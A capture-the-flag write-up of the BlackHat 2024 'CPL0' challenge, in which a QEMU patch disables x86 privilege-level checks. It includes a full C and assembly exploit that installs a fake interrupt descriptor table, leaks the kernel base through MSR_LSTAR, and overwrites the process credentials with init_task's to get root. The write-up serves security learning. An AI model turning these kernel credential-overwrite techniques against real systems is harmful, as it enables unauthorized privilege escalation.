I played BlackHat 2024 Qualifiers with AirOverflow. I didn’t get much time to play and only managed to solve CPL0. The challenge provided a qemu patch and docker container files. I assumed that it was a kernel challenge but it turned out to be very different. Here’s how I solved it: -
Analysis
Patch file
Here’s the Qemu patch file: -
diff --git a/target/i386/tcg/translate.c b/target/i386/tcg/translate.c
index 95bad55bf4..309e540957 100644
--- a/target/i386/tcg/translate.c
+++ b/target/i386/tcg/translate.c
@@ -233,7 +233,7 @@ typedef struct DisasContext {
*/
#define STUB_HELPER(NAME, ...) \
static inline void gen_helper_##NAME(__VA_ARGS__) \
- { qemu_build_not_reached(); }
+ { /* qemu_build_not_reached(); */ }
#ifdef CONFIG_USER_ONLY
STUB_HELPER(clgi, TCGv_env env)
@@ -1386,11 +1386,7 @@ static void gen_exception_gpf(DisasContext *s)
/* Check for cpl == 0; if not, raise #GP and return false. */
static bool check_cpl0(DisasContext *s)
{
- if (CPL(s) == 0) {
- return true;
- }
- gen_exception_gpf(s);
- return false;
+ return true;
}
/* XXX: add faster immediate case */
The patch file modifies a function and a macro. The macro is simply a wrapper for labeling unreachable regions in the code. Our interest lies in the function check_cpl0
. Whatever the function was checking has been patched to always return true.
What is CPL?
For those of you who don’t know, Qemu is a CPU emulator. It helps translates instruction of one guest CPU type on another host CPU. Guest and host CPUs can be same. This helps develops test programs that handle low level stuff without having to debug everything on their physical CPU, which is an extremely frustrating task.
If you track the CPL
macro in qemu code, it shows up to be the following: -
#define CPL(S) ((S)->cpl)
Here S
or s
in the function is a pointer of type struct DisasContext
. The cpl
member of this struct has the following comment: -
typedef struct DisasContext {
DisasContextBase base;
target_ulong pc; /* pc = eip + cs_base */
target_ulong cs_base; /* base of CS segment */
target_ulong pc_save;
MemOp aflag;
MemOp dflag;
int8_t override; /* -1 if no override, else R_CS, R_DS, etc */
uint8_t prefix;
bool has_modrm;
uint8_t modrm;
#ifndef CONFIG_USER_ONLY
uint8_t cpl; /* code priv level */
uint8_t iopl; /* i/o priv level */
#endif
[truncated]
So now we know that CPL
is actually code privilege level
. But what does it mean?
If you look it up in the Intel docs, you will find that code on x86 CPUs have a ring model of privileges. These privileges are also called code privileges. It has privilege levels for 0
to 3
(some details are avoided for brevity). 0
Privilege level is where the Kernel executes and 3
privilege level is what all user programs are assigned. This helps CPUs deny access to sensitive things to user programs and maintains privilege separation.
The patch modified the CPL check such that whenever a privileged instruction is encountered in userspace code, it treats it as though it came from kernel code. Hence any user program can do kernel actions and execute privileged instructions.
What Privileged instructions are there?
If you look up in the Intel’s Software Developer Manual for privileged instructions, you will find the following section:
6.9 PRIVILEGED INSTRUCTIONS
Some of the system instructions (called “privileged instructions”) are protected from use by application programs.
The privileged instructions control system functions (such as the loading of system registers). They can be
executed only when the CPL is 0 (most privileged). If one of these instructions is executed when the CPL is not 0,
a general-protection exception (#GP) is generated. The following system instructions are privileged instructions:
• LGDT — Load GDT register.
• LLDT — Load LDT register.
• LTR — Load task register.
• LIDT — Load IDT register.
• MOV (control registers) — Load and store control registers.
• LMSW — Load machine status word.
• CLTS — Clear task-switched flag in register CR0.
• MOV (debug registers) — Load and store debug registers.
• INVD — Invalidate cache, without writeback.
• WBINVD — Invalidate cache, with writeback.
• INVLPG — Invalidate TLB entry.
• HLT— Halt processor.
• RDMSR — Read Model-Specific Registers.
• WRMSR — Write Model-Specific Registers.
• RDPMC — Read Performance-Monitoring Counter.
• RDTSC — Read Time-Stamp Counter.
Some of the privileged instructions are available only in the more recent families of Intel 64 and IA-32 processors
(see Section 24.13, “New Instructions In the Pentium and Later IA-32 Processors”).
The PCE and TSD flags in register CR4 (bits 4 and 2, respectively) enable the RDPMC and RDTSC instructions,
respectively, to be executed at any CPL.
This gives us a list of privileged instructions and their short descriptions.
Exploitation
What is the Objective?
Since our code was executing as an unprivileged user, it was obvious that we had to escalate privileges. But we had to do it using some privileged instruction instead of exploiting the kernel.
Interrupt Descriptor Table
I decided to overwrite the interrupt descriptor table using the LIDT
instruction. The Interrupt Descriptor table holds entries for handling interrupts.
Interrupts are the equivalent of “events” in an Operating System. A common interrupt is int 0x80
that is used to serve syscalls in Linux.
By overwriting IDT, we will control what code is executed when an interrupt is generated. As to why we want that is because whenever an interrupt is generated, the code privilege level is actually made 0
. We need this because we need to access MSRs (Model Specific Registers) and I wasn’t able to access them using a user program.
By searching for ways to escalate privileges when we have control of IDT revealed this and this writeup.
The first writeup explains the IDT entry structure in detail and the second one provides details on how to escalate privileges when you can execute code in CPL0.
Exploit
I first made C structs for IDT and IDT entry, then I first read the IDT using SIDT
to later recover the IDT to a stable state, made a fake IDT that will redirect all interrupts to my handle, and performed an interrupt to execute the handler. The handler does privilege escalation based on hxp writeup.
The privilege escalation is done by overwriting the struct cred
of the current process with init_task
. The struct is located by access current
(in linux kernel language) that is acquired by reading the gs
segment register. To access the kernel gs
, swapgs
is executed and init_task
is located by getting a kernel leak via reading MSR_LSTAR
which holds the handler for syscall
and sysenter
instructions. cli
and sti
are used to disable and enable interrupts respectively and LIDT
is used to fix IDT so the program doesn’t crash after returning. To return iretq
is used because we are in an interrupt context.
Final exploit
#include <fcntl.h>
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <sys/mman.h>
#define INTERRUPT_SS 0x0010
#define INTERRUPT_FLAGS 0xee00
#define TOTAL_INTERRUPTS 0x100
struct IDT {
uint16_t limit;
uint64_t addr;
} __attribute__((packed));
typedef struct {
uint16_t loword;
uint16_t ss;
uint16_t flags;
uint16_t hiword;
uint32_t hidword;
uint32_t reserved;
} __attribute__((packed)) IDTEntry;
void interrupt_handler(void);
struct IDT fake_idt = {}, original_idt = {};
int create_fake_idt(struct IDT* out_idt, void * handler){
IDTEntry *idt = mmap(NULL, sizeof(IDTEntry) * TOTAL_INTERRUPTS, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANON, -1, 0);
if (idt == MAP_FAILED)
return -1;
IDTEntry entry = {
.flags = INTERRUPT_FLAGS,
.ss = INTERRUPT_SS,
.hidword = (uint64_t) handler >> 32,
.hiword = ((uint64_t) handler & 0xffff0000) >> 16,
.loword = (uint64_t) handler & 0xffff};
for (int i = 0; i < TOTAL_INTERRUPTS; i++){
idt[i] = entry;
}
out_idt->addr = idt;
out_idt->limit = sizeof(IDTEntry) * TOTAL_INTERRUPTS - 1;
return 0;
}
int main(){
asm volatile("sidt %0" : "=m" (original_idt));
if (create_fake_idt(&fake_idt, interrupt_handler) < 0){
fprintf(stderr, "Error creating fake IDT\n");
}
asm volatile ("lidt %0" : "=m" (fake_idt));
asm volatile ("int 0");
system("id; cat /root/flag.txt");
return 0;
}
#include <linux/mman.h>
#include <sys/syscall.h>
#define MSR_LSTAR 0xc0000082
#define KASLR_LSTAR 0x800080
#define KASLR_INIT_TASK 0xe0a580
#define PERCPU_CURRENT 0x21440
#define STRUCT_TASK_STRUCT_REAL_CRED 0x5b0
#define STRUCT_TASK_STRUCT_CRED 0x5b8
#define STRUCT_CRED_USAGE 0x0
.global interrupt_handler
interrupt_handler:
// Disable interrupts (interrupts cause double faults right now)
cli
// Read LSTAR to bypass KASLR
movl $MSR_LSTAR, %ecx
rdmsr
shlq $32, %rdx
orq %rax, %rdx
subq $KASLR_LSTAR, %rdx
// Get access to per-cpu variables (current, mostly) via swapgs
swapgs
// Set current->cred and current->real_cred to init_task->cred
addq $KASLR_INIT_TASK, %rdx
movq STRUCT_TASK_STRUCT_CRED(%rdx), %rdx
addl $2, STRUCT_CRED_USAGE(%rdx)
movq %gs:PERCPU_CURRENT, %rax
movq %rdx, STRUCT_TASK_STRUCT_CRED(%rax)
movq %rdx, STRUCT_TASK_STRUCT_REAL_CRED(%rax)
// Swap back
swapgs
// Fix IDT
lidt original_idt
// Enable interrupts
sti
iretq